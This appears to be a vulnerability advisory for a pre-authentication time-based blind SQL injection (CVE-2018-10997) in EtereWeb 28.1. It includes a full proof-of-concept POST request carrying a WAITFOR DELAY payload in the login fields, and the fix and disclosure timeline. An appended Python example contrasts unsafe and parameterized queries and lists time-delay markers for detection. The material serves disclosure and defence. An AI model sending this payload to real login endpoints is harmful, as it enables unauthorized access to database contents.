Last active September 20, 2018 18:39
Technicolor Security Office - Vulnerability Advisory
#######################################################################
#Title: Time-Based Blind SQL-Injection
#Product: Etere Web
#Homepage: https://www.etere.com/DocView/1009/ETEREWEB.aspx
#Vulnerable versions: Etere Web 28.1
#CVE: CVE-2018-10997
#Impact: critical
#Discoverer: Dion Bellemare
#######################################################################
-----------------------------------------------------------------------
[Description]
EtereWeb 28.1 has a pre-authentication blind SQL injection in the POST parameters txUserName and txPassword.
-----------------------------------------------------------------------
[Vendor of Product]
Etere Pte Ltd
-----------------------------------------------------------------------
[Affected Product Code Base]
EtereWeb - 28.1
-----------------------------------------------------------------------
[Attack Type]
Remote
-----------------------------------------------------------------------
[Impact Information Disclosure]
true
-----------------------------------------------------------------------
[CVE Impact Other]
An attacker can exploit this vulnerability to disclose sensitive database (MSSQL DBMS) information and contents. In some installation scenarios it may be possible to compromise the remote system and take full control.
-----------------------------------------------------------------------
[Has vendor confirmed or acknowledged the vulnerability?]
true
-----------------------------------------------------------------------
[Proof Of Concept]
Target: http://etere.example.com/etereweb/
Target Parameters: txUserName (POST)
Target Parameters: txPassword (POST)
POST /etereweb/ HTTP/1.1
Host: etere.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://etere.example.com/etereweb/
Cookie: ASP.NET_SessionId=0ep1w51ja4yezeubp2m15vo0
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 750
txUserName=' WAITFOR DELAY '0:0:5'--&txPassword='&btnAccedi=Login&hdIdUser=
-----------------------------------------------------------------------
[Solution]
Upgrade EtereWeb to version 28.1.20 or greater
-----------------------------------------------------------------------
[Advisory History]
2018-05-02 - Initial discovery and write-up of vuln advisory
2018-05-02 - Sent notification email to Etere contact
2018-05-03 - Received initial response from Etere
2018-05-08 - Sent email to suggest using PGP to encrypt email
2018-05-29 - Additional details of vuln provided to Etere
2018-05-31 - Etere responds that vuln is fixed in version 28.1.20
-----------------------------------------------------------------------
[Discoverer]
Dion Bellemare
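The following is an added illustration, not code from the advisory or from Etere, of the two defender-side points behind the Description and Proof Of Concept sections above: the root cause (login credentials concatenated into a SQL statement, so the WAITFOR DELAY in txUserName is executed as SQL) beside the parameterized form that removes it, and a request-body check that flags the time-delay primitives a time-based blind probe depends on. The users table and the form bodies are constructed here; sqlite3 stands in for the product's MSSQL back end so the block runs offline (WAITFOR DELAY is MSSQL syntax and is shown as a string, not executed), and the function names are this example's own.

```python
import sqlite3
import urllib.parse

# Constructed stand-in for the product's login table. sqlite3 is used so the
# example runs offline; the real back end is MSSQL (assumption from the advisory).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct-horse')")
    return conn


def build_login_query_unsafe(username, password):
    """The vulnerable pattern: user input spliced into the SQL text.

    Returned rather than executed so the reader can see that the
    payload's WAITFOR DELAY becomes part of the statement the DBMS parses.
    """
    return ("SELECT * FROM users WHERE username = '" + username +
            "' AND password = '" + password + "'")


def lookup_user_safe(conn, username, password):
    """The fix: a parameterized query. The values travel separately from the
    SQL text, so quotes, comments and WAITFOR inside them are plain data."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# Time-delay primitives across common DBMSs; a time-based blind probe needs
# one of these to produce its measurable delay.
TIME_DELAY_MARKERS = ("waitfor delay", "sleep(", "pg_sleep(", "benchmark(")


def flag_time_delay_payload(form_body):
    """Return the form fields whose decoded value carries a time-delay primitive.

    Intended for a WAF / reverse-proxy style check on the decoded POST body;
    IIS access logs do not record bodies, so this has to run inline.
    """
    fields = urllib.parse.parse_qs(form_body, keep_blank_values=True)
    flagged = []
    for name, values in fields.items():
        if any(marker in value.lower() for value in values
               for marker in TIME_DELAY_MARKERS):
            flagged.append(name)
    return flagged


# Constructed sample bodies: the advisory's own PoC body and a benign login.
ADVISORY_BODY = ("txUserName=' WAITFOR DELAY '0:0:5'--"
                 "&txPassword='&btnAccedi=Login&hdIdUser=")
BENIGN_BODY = "txUserName=alice&txPassword=correct-horse&btnAccedi=Login&hdIdUser="


if __name__ == "__main__":
    conn = make_db()
    print("unsafe SQL text :", build_login_query_unsafe("' WAITFOR DELAY '0:0:5'--", "'"))
    print("safe lookup     :", lookup_user_safe(conn, "' WAITFOR DELAY '0:0:5'--", "'"))
    print("flagged (PoC)   :", flag_time_delay_payload(ADVISORY_BODY))
    print("flagged (benign):", flag_time_delay_payload(BENIGN_BODY))
```

In the ASP.NET code base the advisory concerns, the equivalent of the parameterized lookup is a SqlCommand with SqlParameter objects (Parameters.Add) rather than string concatenation; the body check is a compensating control only and does not replace that fix, since a single 5-second delay on the login endpoint is also a usable detection signal in response-time monitoring.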